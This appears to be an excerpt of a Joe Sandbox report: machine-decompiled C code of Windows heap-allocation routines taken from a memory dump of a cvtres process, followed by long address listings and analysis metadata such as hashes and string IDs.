									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E055C7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E05661411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E055D174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E055CB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E055C7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E056614FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E055C99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E055CA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E055DABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                                        0x055ca309
                                                                        0x055ca316
                                                                        0x055ca319
                                                                        0x055ca31d
                                                                        0x055ca32d
                                                                        0x055ca331
                                                                        0x05611e0d
                                                                        0x05611e10
                                                                        0x055ca3cb
                                                                        0x055ca3cb
                                                                        0x055ca3bd
                                                                        0x055ca3c3
                                                                        0x055ca3c3
                                                                        0x055ca33a
                                                                        0x05611e17
                                                                        0x05611e1b
                                                                        0x05611e1d
                                                                        0x05611e2f
                                                                        0x05611e34
                                                                        0x05611e36
                                                                        0x05611e3c
                                                                        0x05611e3c
                                                                        0x05611e3c
                                                                        0x05611e3c
                                                                        0x05611e36
                                                                        0x05611e42
                                                                        0x05611e45
                                                                        0x05611e47
                                                                        0x055ca3f8
                                                                        0x055ca3f8
                                                                        0x055ca3fb
                                                                        0x055ca3fd
                                                                        0x05611e50
                                                                        0x055ca403
                                                                        0x055ca411
                                                                        0x055ca411
                                                                        0x055ca411
                                                                        0x055ca41e
                                                                        0x055ca420
                                                                        0x055ca424
                                                                        0x055ca427
                                                                        0x055ca7c9
                                                                        0x055ca7cd
                                                                        0x055ca7d2
                                                                        0x055ca7d9
                                                                        0x055ca7e0
                                                                        0x055ca7e3
                                                                        0x055ca7ed
                                                                        0x055ca7f3
                                                                        0x055ca7f9
                                                                        0x055ca7ff
                                                                        0x055ca802
                                                                        0x055ca807
                                                                        0x055ca809
                                                                        0x055ca809
                                                                        0x055ca809
                                                                        0x055ca80f
                                                                        0x055ca80f
                                                                        0x055ca812
                                                                        0x055ca81c
                                                                        0x055ca821
                                                                        0x055ca824
                                                                        0x055ca42d
                                                                        0x055ca42d
                                                                        0x055ca42d
                                                                        0x055ca42d
                                                                        0x055ca42d
                                                                        0x055ca436
                                                                        0x055ca43a
                                                                        0x055ca609
                                                                        0x055ca60d
                                                                        0x055ca612
                                                                        0x055ca616
                                                                        0x055ca61a
                                                                        0x05611e57
                                                                        0x05611e59
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05611e5f
                                                                        0x055ca620
                                                                        0x055ca627
                                                                        0x05611e64
                                                                        0x05611e66
                                                                        0x05611e6c
                                                                        0x05611e72
                                                                        0x05611e76
                                                                        0x05611e95
                                                                        0x05611e9a
                                                                        0x05611e78
                                                                        0x05611e8d
                                                                        0x05611e92
                                                                        0x05611ea0
                                                                        0x05611ea5
                                                                        0x05611eaa
                                                                        0x05611eb2
                                                                        0x05611eb6
                                                                        0x05611eb9
                                                                        0x05611eb9
                                                                        0x05611ebe
                                                                        0x05611ec2
                                                                        0x05611ec2
                                                                        0x05611e66
                                                                        0x055ca62d
                                                                        0x055ca633
                                                                        0x055ca636
                                                                        0x055ca63a
                                                                        0x055ca63c
                                                                        0x055ca640
                                                                        0x055ca642
                                                                        0x055ca644
                                                                        0x055ca644
                                                                        0x055ca644
                                                                        0x055ca64d
                                                                        0x055ca64d
                                                                        0x055ca651
                                                                        0x055ca655
                                                                        0x05611eca
                                                                        0x05611ed1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05611ed7
                                                                        0x00000000
                                                                        0x055ca65b
                                                                        0x055ca669
                                                                        0x055ca66e
                                                                        0x055ca670
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055ca676
                                                                        0x055ca67b
                                                                        0x055ca680
                                                                        0x055ca682
                                                                        0x05611f1a
                                                                        0x055ca688
                                                                        0x055ca688
                                                                        0x055ca688
                                                                        0x055ca68a
                                                                        0x055ca68d
                                                                        0x05611f24
                                                                        0x05611f2a
                                                                        0x05611f31
                                                                        0x05611f43
                                                                        0x05611f43
                                                                        0x05611f31
                                                                        0x055ca693
                                                                        0x055ca697
                                                                        0x055ca69d
                                                                        0x055ca6a0
                                                                        0x055ca6a6
                                                                        0x055ca6a8
                                                                        0x055ca6a8
                                                                        0x055ca6a8
                                                                        0x055ca6a8
                                                                        0x055ca6b2
                                                                        0x055ca6b7
                                                                        0x055ca6c1
                                                                        0x055ca6c6
                                                                        0x055ca6d2
                                                                        0x055ca6d9
                                                                        0x055ca6e3
                                                                        0x055ca6e6
                                                                        0x055ca6eb
                                                                        0x055ca6ed
                                                                        0x055ca6ed
                                                                        0x055ca6ed
                                                                        0x055ca6ed
                                                                        0x055ca6f3
                                                                        0x055ca6f8
                                                                        0x055ca702
                                                                        0x055ca70a
                                                                        0x055ca70e
                                                                        0x055ca71a
                                                                        0x055ca71e
                                                                        0x05611fcb
                                                                        0x05611fcf
                                                                        0x05611fdd
                                                                        0x05611fe3
                                                                        0x05611fe3
                                                                        0x055ca724
                                                                        0x055ca728
                                                                        0x055ca72a
                                                                        0x055ca72d
                                                                        0x055ca737
                                                                        0x055ca73a
                                                                        0x055ca73c
                                                                        0x055ca742
                                                                        0x055ca748
                                                                        0x05611f4d
                                                                        0x05611f50
                                                                        0x05611f56
                                                                        0x05611f5c
                                                                        0x05611f5f
                                                                        0x05611f7e
                                                                        0x05611f83
                                                                        0x05611f61
                                                                        0x05611f76
                                                                        0x05611f7b
                                                                        0x05611f89
                                                                        0x05611f8e
                                                                        0x05611f93
                                                                        0x05611f94
                                                                        0x05611f9a
                                                                        0x05611f9c
                                                                        0x05611f9e
                                                                        0x05611fa1
                                                                        0x05611fa1
                                                                        0x05611fa6
                                                                        0x05611fa6
                                                                        0x05611f50
                                                                        0x055ca74e
                                                                        0x055ca751
                                                                        0x055ca754
                                                                        0x055ca75d
                                                                        0x055ca75e
                                                                        0x055ca762
                                                                        0x055ca767
                                                                        0x05611faf
                                                                        0x05611fb0
                                                                        0x05611fb9
                                                                        0x05611fbe
                                                                        0x05611fc2
                                                                        0x05611fc2
                                                                        0x055ca76d
                                                                        0x055ca76d
                                                                        0x055ca775
                                                                        0x055ca778
                                                                        0x055ca77d
                                                                        0x055ca77d
                                                                        0x055ca71e
                                                                        0x055ca782
                                                                        0x055ca787
                                                                        0x055ca789
                                                                        0x05611ff3
                                                                        0x055ca78f
                                                                        0x055ca78f
                                                                        0x055ca78f
                                                                        0x055ca791
                                                                        0x055ca794
                                                                        0x05611ffd
                                                                        0x05612006
                                                                        0x0561200c
                                                                        0x05612017
                                                                        0x05612019
                                                                        0x05612024
                                                                        0x05612024
                                                                        0x05612024
                                                                        0x05612047
                                                                        0x05612047
                                                                        0x0561200c
                                                                        0x055ca79a
                                                                        0x055ca79f
                                                                        0x055ca7a4
                                                                        0x055ca7a9
                                                                        0x055ca7ab
                                                                        0x0561205a
                                                                        0x055ca7b1
                                                                        0x055ca7b1
                                                                        0x055ca7b1
                                                                        0x055ca7b3
                                                                        0x055ca7b6
                                                                        0x00000000
                                                                        0x055ca7bc
                                                                        0x05612066
                                                                        0x05612068
                                                                        0x05612073
                                                                        0x05612073
                                                                        0x05612073
                                                                        0x05612078
                                                                        0x05612079
                                                                        0x0561207d
                                                                        0x00000000
                                                                        0x0561207d
                                                                        0x055ca7b6
                                                                        0x055ca440
                                                                        0x055ca440
                                                                        0x055ca440
                                                                        0x055ca446
                                                                        0x055ca44c
                                                                        0x055ca44f
                                                                        0x055ca453
                                                                        0x055ca455
                                                                        0x056120b3
                                                                        0x056120b9
                                                                        0x056120b9
                                                                        0x055ca45d
                                                                        0x055ca460
                                                                        0x055ca464
                                                                        0x055ca466
                                                                        0x055ca46b
                                                                        0x055ca46f
                                                                        0x055ca471
                                                                        0x055ca471
                                                                        0x055ca471
                                                                        0x055ca474
                                                                        0x055ca479
                                                                        0x055ca47d
                                                                        0x055ca47f
                                                                        0x05612229
                                                                        0x0561222f
                                                                        0x055ca3c8
                                                                        0x055ca3c8
                                                                        0x055ca3ca
                                                                        0x055ca3ca
                                                                        0x00000000
                                                                        0x055ca3ca
                                                                        0x05612235
                                                                        0x0561223a
                                                                        0x0561223a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05612240
                                                                        0x05612246
                                                                        0x0561224a
                                                                        0x05612269
                                                                        0x0561226e
                                                                        0x0561224c
                                                                        0x05612261
                                                                        0x05612266
                                                                        0x05612274
                                                                        0x05612279
                                                                        0x0561227e
                                                                        0x05612286
                                                                        0x05612288
                                                                        0x0561228d
                                                                        0x0561228d
                                                                        0x05612292
                                                                        0x05612292
                                                                        0x05612295
                                                                        0x05612295
                                                                        0x00000000
                                                                        0x05612295
                                                                        0x055ca485
                                                                        0x055ca489
                                                                        0x055ca48b
                                                                        0x055ca48f
                                                                        0x055ca493
                                                                        0x055ca497
                                                                        0x055ca49b
                                                                        0x055ca4bb
                                                                        0x055ca4bb
                                                                        0x055ca4bd
                                                                        0x055ca4ff
                                                                        0x055ca4ff
                                                                        0x055ca501
                                                                        0x055ca505
                                                                        0x055ca50f
                                                                        0x055ca517
                                                                        0x055ca51b
                                                                        0x055ca527
                                                                        0x055ca52b
                                                                        0x05612182
                                                                        0x05612185
                                                                        0x05612193
                                                                        0x05612199
                                                                        0x05612199
                                                                        0x055ca531
                                                                        0x055ca535
                                                                        0x055ca538
                                                                        0x055ca548
                                                                        0x055ca54b
                                                                        0x055ca54d
                                                                        0x055ca553
                                                                        0x055ca559
                                                                        0x05612100
                                                                        0x05612103
                                                                        0x05612109
                                                                        0x0561210f
                                                                        0x05612112
                                                                        0x05612131
                                                                        0x05612136
                                                                        0x05612114
                                                                        0x05612129
                                                                        0x0561212e
                                                                        0x0561213c
                                                                        0x05612141
                                                                        0x05612147
                                                                        0x0561214d
                                                                        0x05612151
                                                                        0x05612154
                                                                        0x05612154
                                                                        0x05612159
                                                                        0x05612159
                                                                        0x05612103
                                                                        0x055ca55f
                                                                        0x055ca562
                                                                        0x055ca565
                                                                        0x055ca567
                                                                        0x05612162
                                                                        0x055ca56d
                                                                        0x055ca574
                                                                        0x055ca575
                                                                        0x055ca579
                                                                        0x055ca57e
                                                                        0x05612169
                                                                        0x0561216a
                                                                        0x05612170
                                                                        0x05612175
                                                                        0x05612179
                                                                        0x05612179
                                                                        0x055ca57e
                                                                        0x055ca584
                                                                        0x055ca58f
                                                                        0x055ca58f
                                                                        0x055ca52b
                                                                        0x055ca5ad
                                                                        0x055ca5bc
                                                                        0x055ca5c1
                                                                        0x055ca5c6
                                                                        0x055ca5cb
                                                                        0x055ca5cd
                                                                        0x056121a9
                                                                        0x055ca5d3
                                                                        0x055ca5d3
                                                                        0x055ca5d3
                                                                        0x055ca5d5
                                                                        0x055ca5d8
                                                                        0x056121b3
                                                                        0x056121bc
                                                                        0x056121c2
                                                                        0x056121cd
                                                                        0x056121cf
                                                                        0x056121da
                                                                        0x056121da
                                                                        0x056121da
                                                                        0x056121f7
                                                                        0x056121f7
                                                                        0x056121c2
                                                                        0x055ca5de
                                                                        0x055ca5e3
                                                                        0x055ca5e8
                                                                        0x055ca5ea
                                                                        0x0561220a
                                                                        0x055ca5f0
                                                                        0x055ca5f0
                                                                        0x055ca5f0
                                                                        0x055ca5f2
                                                                        0x055ca5f5
                                                                        0x05612219
                                                                        0x0561221b
                                                                        0x0561208c
                                                                        0x0561208c
                                                                        0x0561208c
                                                                        0x05612095
                                                                        0x05612096
                                                                        0x05612097
                                                                        0x05612098
                                                                        0x056120a4
                                                                        0x056120a5
                                                                        0x056120a9
                                                                        0x056120a9
                                                                        0x00000000
                                                                        0x055ca5f5
                                                                        0x055ca4bf
                                                                        0x055ca4d3
                                                                        0x055ca4d8
                                                                        0x055ca4da
                                                                        0x05611ede
                                                                        0x05611ede
                                                                        0x05611ee4
                                                                        0x05611ee9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05611f07
                                                                        0x00000000
                                                                        0x05611f07
                                                                        0x055ca4e0
                                                                        0x055ca4e5
                                                                        0x055ca4e7
                                                                        0x056120cb
                                                                        0x055ca4ed
                                                                        0x055ca4ed
                                                                        0x055ca4ed
                                                                        0x055ca4f2
                                                                        0x055ca4f5
                                                                        0x056120d5
                                                                        0x056120de
                                                                        0x056120e4
                                                                        0x056120f6
                                                                        0x056120f6
                                                                        0x056120e4
                                                                        0x055ca4fb
                                                                        0x00000000
                                                                        0x055ca4fb
                                                                        0x055ca4a1
                                                                        0x055ca4a4
                                                                        0x055ca4a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055ca4aa
                                                                        0x055ca4ac
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055ca4b2
                                                                        0x055ca4b5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055ca4b5
                                                                        0x055ca43a
                                                                        0x055ca340
                                                                        0x055ca346
                                                                        0x055ca600
                                                                        0x00000000
                                                                        0x055ca600
                                                                        0x055ca34f
                                                                        0x055ca351
                                                                        0x055ca358
                                                                        0x055ca3c6
                                                                        0x00000000
                                                                        0x055ca371
                                                                        0x055ca37a
                                                                        0x055ca37f
                                                                        0x055ca382
                                                                        0x055ca384
                                                                        0x055ca394
                                                                        0x00000000
                                                                        0x055ca396
                                                                        0x055ca399
                                                                        0x055ca3a7
                                                                        0x055ca3b0
                                                                        0x055ca3b4
                                                                        0x055ca3bb
                                                                        0x055ca3d2
                                                                        0x055ca3da
                                                                        0x055ca3df
                                                                        0x055ca3e1
                                                                        0x055ca3e5
                                                                        0x055ca3ea
                                                                        0x055ca3f0
                                                                        0x055ca3f0
                                                                        0x055ca3e1
                                                                        0x00000000
                                                                        0x055ca3bb
                                                                        0x055ca394

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-523794902
                                                                        • Opcode ID: b2f3d8bcf24a32550c36f5ffdc49d0d87a1ad6585e376b897bcca1ec6718bf14
                                                                        • Instruction ID: f9a29a8c2e36fd5a96c806e8ade95059dbecfd7012c3ad81214cfda7b6bd3124
                                                                        • Opcode Fuzzy Hash: b2f3d8bcf24a32550c36f5ffdc49d0d87a1ad6585e376b897bcca1ec6718bf14
                                                                        • Instruction Fuzzy Hash: 6C42FC316083859FC715CF68C898A3ABFE6FF88704F0849ADE8868B751D734D981CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05662D82 Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 64%
                                                                        			E05662D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x5680e80);
				E055FD0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E055A40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E056630C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E055AB150();
						} else {
							E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E055AB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E055BEEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E05664496(_t181, 0);
						_t177 = L055C4620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E056649A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E0565FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E055A1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E055D16C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E05664496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x5696360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x5696364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x5696366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E055AB150();
								} else {
									E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E0564D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E055AB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E055AB150();
								} else {
									E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E055AB150("Just allocated block at %p for %Ix bytes\n",  *0x5696360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x5696378 = 1;
									 *0x56960c0 = 0;
									asm("int3");
									 *0x5696378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x5695708; // 0x0
					 *0x569b1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E055FD130(0, _t177, _t181);
				}
			}





















                                                                        0x05662d82
                                                                        0x05662d84
                                                                        0x05662d89
                                                                        0x05662d8e
                                                                        0x05662d90
                                                                        0x05662d92
                                                                        0x05662d97
                                                                        0x05662d9a
                                                                        0x05662da4
                                                                        0x05662dc0
                                                                        0x05662dc3
                                                                        0x05662dd1
                                                                        0x05662dd6
                                                                        0x05662dd8
                                                                        0x056630a7
                                                                        0x056630a7
                                                                        0x056630aa
                                                                        0x056630aa
                                                                        0x056630ad
                                                                        0x056630b4
                                                                        0x00000000
                                                                        0x056630b9
                                                                        0x05662de3
                                                                        0x05662de8
                                                                        0x05662deb
                                                                        0x05662dee
                                                                        0x05662df1
                                                                        0x05662df3
                                                                        0x05662dfb
                                                                        0x05662dfb
                                                                        0x05662df5
                                                                        0x05662df5
                                                                        0x05662df5
                                                                        0x05662e04
                                                                        0x05662e0a
                                                                        0x05662e0d
                                                                        0x05662e11
                                                                        0x05662e11
                                                                        0x05662e12
                                                                        0x05662e15
                                                                        0x05662e18
                                                                        0x05662e1a
                                                                        0x05663027
                                                                        0x05663027
                                                                        0x0566302d
                                                                        0x05663030
                                                                        0x0566304f
                                                                        0x05663054
                                                                        0x05663032
                                                                        0x05663047
                                                                        0x0566304c
                                                                        0x0566305a
                                                                        0x05663063
                                                                        0x00000000
                                                                        0x05662e20
                                                                        0x05662e20
                                                                        0x05662e23
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05662e29
                                                                        0x05662e2b
                                                                        0x05662e47
                                                                        0x05662e2d
                                                                        0x05662e33
                                                                        0x05662e38
                                                                        0x05662e3f
                                                                        0x05662e42
                                                                        0x05662e42
                                                                        0x05662e4e
                                                                        0x05662e5d
                                                                        0x05662e5f
                                                                        0x05662e62
                                                                        0x05662e66
                                                                        0x05662e6b
                                                                        0x05662e6d
                                                                        0x00000000
                                                                        0x05662e73
                                                                        0x05662e73
                                                                        0x05662e76
                                                                        0x05662e7a
                                                                        0x05662e83
                                                                        0x05662e83
                                                                        0x05662e83
                                                                        0x05662e85
                                                                        0x05662e87
                                                                        0x05662e8a
                                                                        0x05662e8d
                                                                        0x05662e92
                                                                        0x05662e9c
                                                                        0x05662e9f
                                                                        0x05662ea1
                                                                        0x05662ea2
                                                                        0x05662ea6
                                                                        0x05662ea6
                                                                        0x05662e9f
                                                                        0x05662eab
                                                                        0x05662eaf
                                                                        0x05662edf
                                                                        0x05662ee2
                                                                        0x05662ee5
                                                                        0x05662eb1
                                                                        0x05662eb3
                                                                        0x05662eb8
                                                                        0x05662ebd
                                                                        0x05662ec4
                                                                        0x05662ed6
                                                                        0x05662ec6
                                                                        0x05662ec7
                                                                        0x05662ecc
                                                                        0x05662ecf
                                                                        0x05662ed2
                                                                        0x05662ed2
                                                                        0x05662ed9
                                                                        0x05662ed9
                                                                        0x05662ee8
                                                                        0x05662eeb
                                                                        0x05662eef
                                                                        0x05662ef2
                                                                        0x05662efe
                                                                        0x05662f04
                                                                        0x05662f04
                                                                        0x05662f04
                                                                        0x05662f06
                                                                        0x05662f0d
                                                                        0x05662f0f
                                                                        0x05662f13
                                                                        0x05662f13
                                                                        0x05662f1b
                                                                        0x05662f21
                                                                        0x05662f27
                                                                        0x05662f95
                                                                        0x05662f98
                                                                        0x05662f9b
                                                                        0x05662fa0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05662fa6
                                                                        0x05662fa9
                                                                        0x05662fac
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05662fb2
                                                                        0x05662fb9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05662fc3
                                                                        0x05662fca
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05662fd0
                                                                        0x05662fd6
                                                                        0x05662fd9
                                                                        0x05662ff8
                                                                        0x05662ffd
                                                                        0x05662fdb
                                                                        0x05662ff0
                                                                        0x05662ff5
                                                                        0x0566300e
                                                                        0x0566300f
                                                                        0x0566301a
                                                                        0x00000000
                                                                        0x05662f29
                                                                        0x05662f29
                                                                        0x05662f2c
                                                                        0x05662f4b
                                                                        0x05662f50
                                                                        0x05662f2e
                                                                        0x05662f43
                                                                        0x05662f48
                                                                        0x05662f56
                                                                        0x05662f64
                                                                        0x05662f6c
                                                                        0x05662f6c
                                                                        0x05662f72
                                                                        0x05662f76
                                                                        0x05662f7c
                                                                        0x05662f83
                                                                        0x05662f89
                                                                        0x05662f8a
                                                                        0x05662f8a
                                                                        0x00000000
                                                                        0x05662f76
                                                                        0x05662f27
                                                                        0x05662e6d
                                                                        0x05662da6
                                                                        0x05662dab
                                                                        0x05662db3
                                                                        0x05662db9
                                                                        0x056630bc
                                                                        0x056630c1
                                                                        0x056630c1

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
